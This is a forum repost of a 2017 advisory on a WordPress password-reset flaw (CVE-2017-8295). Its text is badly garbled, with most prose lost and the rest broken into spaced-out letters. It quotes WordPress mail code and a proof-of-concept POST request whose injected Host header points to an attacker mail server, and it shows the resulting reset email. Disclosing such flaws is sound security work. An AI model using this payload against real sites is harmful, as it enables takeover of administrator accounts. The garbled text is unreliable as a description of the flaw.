搜索

[11311] 2017-05-05_WordPress曝未经授权的密码重置漏洞(CVE-2017-8295)

文档创建者:s7ckTeam
浏览次数:15
最后更新:2025-01-18
2017-05-05_WordPress曝未经授权的密码重置漏洞(CVE-2017-8295) W o r d P r e s s C V E - 2 0 1 7 - 8 2 9 5     F r e e B u f   2 0 1 7 - 0 5 - 0 5 D a w i d   G o l u n s k i C V E - 2 0 1 7 - 8 2 9 5 2 0 1 7 - 0 5 - 0 3 1 . 0 / I .   W o r d P r e s s < =   4 . 7 . 4 ( 0 d a y ) I I .   W o r d P r e s s P H P M y S Q L 2 0 1 7 2 A l e x a 1 0 0 0 2 7 . 5 % 使 6 0 0 0 使 W o r d P r e s s I I I .   W o r d P r e s s 使 使         W o r d p r e s s I V .   W o r d P r e s s 使         P H P   m a i l ( ) F r o m   e m a i l - - - - - - [   w p - i n c l u d e s / p l u g g a b l e . p h p   ] - - - - - - . . . i f   (   ! i s s e t (   $ f r o m _ e m a i l   )   )   {                 / /   G e t   t h e   s i t e   d o m a i n   a n d   g e t   r i d   o f   w w w .                 $ s i t e n a m e   =   s t r t o l o w e r (   $ _ S E R V E R [ ' S E R V E R _ N A M E ' ]   ) ;                 i f   (   s u b s t r (   $ s i t e n a m e ,   0 ,   4   )   = =   ' w w w . '   )   {                                 $ s i t e n a m e   =   s u b s t r (   $ s i t e n a m e ,   4   ) ;                 }                 $ f r o m _ e m a i l   =   ' w o r d p r e s s @ '   .   $ s i t e n a m e ; } . . .
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - W o r d p r e s s F r o m / R e t u r n - P a t h ( / ) 使 S E R V E R _ N A M E         A p a c h e w e b 使 S E R V E R _ N A M E A p a c h e         S E R V E R _ N A M E a t t a c k e r s - m x s e r v e r . c o m         W o r d p r e s s $ f r o m _ e m a i l w o r d p r e s s @ a t t a c k e r s - m x s e r v e r . c o m F r o m / R e t u r n - P a t h ( / )         P H P         / W o r d P r e s s         使 D o S D N S 使 V .   P O C I P 访 W o r d p r e s s ( I P - b a s e d   v h o s t ) : - - - - - [   H T T P   R e q u e s t   ] - - - - P O S T   / w p / w o r d p r e s s / w p - l o g i n . p h p ? a c t i o n = l o s t p a s s w o r d   H T T P / 1 . 1 H o s t :   i n j e c t e d - a t t a c k e r s - m x s e r v e r . c o m C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d C o n t e n t - L e n g t h :   5 6 u s e r _ l o g i n = a d m i n & r e d i r e c t _ t o = & w p - s u b m i t = G e t + N e w + P a s s w o r d - - - - - - - - - - - - - - - - - - - - - - - - W o r d P r e s s         S E R V E R _ N A M E W o r d p r e s s / u s r / b i n / s e n d m a i l - - - - - - [   r e s u l t i n g   e - m a i l   ] - - - - - S u b j e c t :   [ C o m p a n y X   W P ]   P a s s w o r d   R e s e t R e t u r n - P a t h :   < w o r d p r e s s @ a t t a c k e r s - m x s e r v e r . c o m > F r o m :   W o r d P r e s s < w o r d p r e s s @ a t t a c k e r s - m x s e r v e r . c o m >
M e s s a g e - I D :   < e 6 f d 6 1 4 c 5 d d 8 a 1 c 6 0 4 d f 2 a 7 3 2 e b 7 b 0 1 6 @ a t t a c k e r s - m x s e r v e r . c o m > X - P r i o r i t y :   3 M I M E - V e r s i o n :   1 . 0 C o n t e n t - T y p e :   t e x t / p l a i n ;   c h a r s e t = U T F - 8 C o n t e n t - T r a n s f e r - E n c o d i n g :   8 b i t h t t p : / / c o m p a n y X - w p / w p / w o r d p r e s s / U s e r n a m e :   a d m i n 访 h t t p : / / c o m p a n y x - w p / w p / w o r d p r e s s / w p - l o g i n . p h p ? a c t i o n = r p & k e y = A c e i M F m k M R 4 f s m w x I Z t Z & l o g i n = a d m i n % 3 E R e t u r n - P a t h ,   F r o m ,   M e s s a g e - I D         b a s h / u s r / s b i n / s e n d m a i l # ! / b i n / b a s h c a t   >   / t m p / o u t g o i n g - e m a i l V I .   W o r d P r e s s 访 V I I .   W o r d P r e s s 4 . 7 . 4 V I I I .   U s e C a n o n i c a l N a m e S E R V E R _ N A M E A p a c h e I X .   h t t p s : / / l e g a l h a c k e r s . c o m h t t p s : / / E x p l o i t B o x . i o V e n d o r   s i t e : h t t p s : / / w o r d p r e s s . o r g h t t p : / / h t t p d . a p a c h e . o r g / d o c s / 2 . 4 / m o d / c o r e . h t m l # u s e c a n o n i c a l n a m e h t t p : / / p h p . n e t / m a n u a l / e n / f u n c t i o n . m a i l . p h p h t t p s : / / t o o l s . i e t f . o r g / h t m l / r f c 5 3 2 1 * e x p l o i t b o x f r e e b u f F r e e B u f . c o m

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理